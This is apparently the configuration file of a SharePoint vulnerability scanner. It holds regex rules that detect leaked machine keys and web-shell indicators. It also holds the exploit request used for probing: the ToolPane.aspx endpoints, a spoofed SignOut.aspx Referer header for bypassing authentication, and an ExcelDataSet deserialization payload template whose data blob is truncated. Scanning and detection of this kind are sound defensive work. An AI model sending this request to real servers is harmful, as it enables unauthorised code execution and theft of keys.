README.md
Rendering markdown...
{
"detection_rules": {
"critical_patterns": [
{
"name": "machine_key_extraction",
"pattern": "[A-F0-9]{128,256}\\|[A-Z0-9]+\\|[A-F0-9]{48,96}\\|[A-Z0-9]+\\|Framework[0-9A-Z]+",
"score": 95,
"description": "Full machine key extraction response detected",
"case_insensitive": true
},
{
"name": "pipe_delimited_keys",
"pattern": "[A-F0-9]{64,}\\|[A-Z0-9_]+\\|[A-F0-9]{32,}\\|[A-Z0-9_]+\\|Framework",
"score": 90,
"description": "Pipe-delimited machine key data pattern",
"case_insensitive": true
}
],
"high_patterns": [
{
"name": "secondary_payload",
"patterns": ["spinstall0.aspx", "Page_load()", "System.Web.Configuration.MachineKeySection", "GetApplicationConfig"],
"score": 15,
"description": "Secondary payload indicators"
},
{
"name": "validation_key",
"pattern": "[A-F0-9]{128,256}",
"score": 30,
"description": "Validation key pattern detected"
},
{
"name": "decryption_key",
"pattern": "[A-F0-9]{48,96}",
"score": 25,
"description": "Decryption key pattern detected"
}
],
"medium_patterns": [
{
"name": "sharepoint_components",
"patterns": ["Scorecard", "ExcelDataSet"],
"score": 25,
"description": "SharePoint vulnerable components"
},
{
"name": "framework_patterns",
"pattern": "Framework(20SP1|45|40)",
"score": 10,
"description": "Framework compatibility indicators",
"case_insensitive": true
}
],
"low_patterns": [
{
"name": "error_patterns",
"patterns": ["Microsoft.PerformancePoint.Scorecards", "System.Runtime.Serialization", "CompressedDataTable", "ToolPane processing error", "System.Web.UI.LosFormatter", "ObjectDataProvider"],
"score": 8,
"description": "SharePoint component error patterns"
}
]
},
"confidence_thresholds": {
"critical": 85,
"high": 75,
"medium": 60,
"low": 50
},
"scan_settings": {
"default_timeout": 10,
"default_threads": 10,
"max_retries": 3,
"backoff_factor": 1,
"user_agents": [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
],
"ssl_verification": true,
"verify_certificates": true
},
"endpoints": [
"/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
"/_layouts/16/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"
],
"payload_config": {
"MSOTlPn_Uri": "https://{host}/_controltemplates/15/AclEditor.ascx",
"MSOTlPn_DWP": "\n <%@ Register Tagprefix=\"Scorecard\" Namespace=\"Microsoft.PerformancePoint.Scorecards\" Assembly=\"Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\n <%@ Register Tagprefix=\"asp\" Namespace=\"System.Web.UI\" Assembly=\"System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" %>\n\n <asp:UpdateProgress ID=\"UpdateProgress1\" DisplayAfter=\"10\"\n runat=\"server\" AssociatedUpdatePanelID=\"upTest\">\n <ProgressTemplate>\n <div class=\"divWaiting\">\n <Scorecard:ExcelDataSet CompressedDataTable=\"H4sIAAAAAAAEA...\" DataTable-CaseSensitive=\"false\" runat=\"server\"></Scorecard:ExcelDataSet>\n </div>\n </ProgressTemplate>\n </asp:UpdateProgress>\n "
},
"request_headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "/_layouts/SignOut.aspx",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive"
},
"rate_limiting": {
"enabled": true,
"requests_per_second": 10,
"burst_size": 20,
"adaptive": true
},
"caching": {
"enabled": true,
"cache_duration_seconds": 3600,
"cache_file": "scan_cache.json"
},
"metrics": {
"enabled": true,
"track_performance": true,
"track_accuracy": true
}
}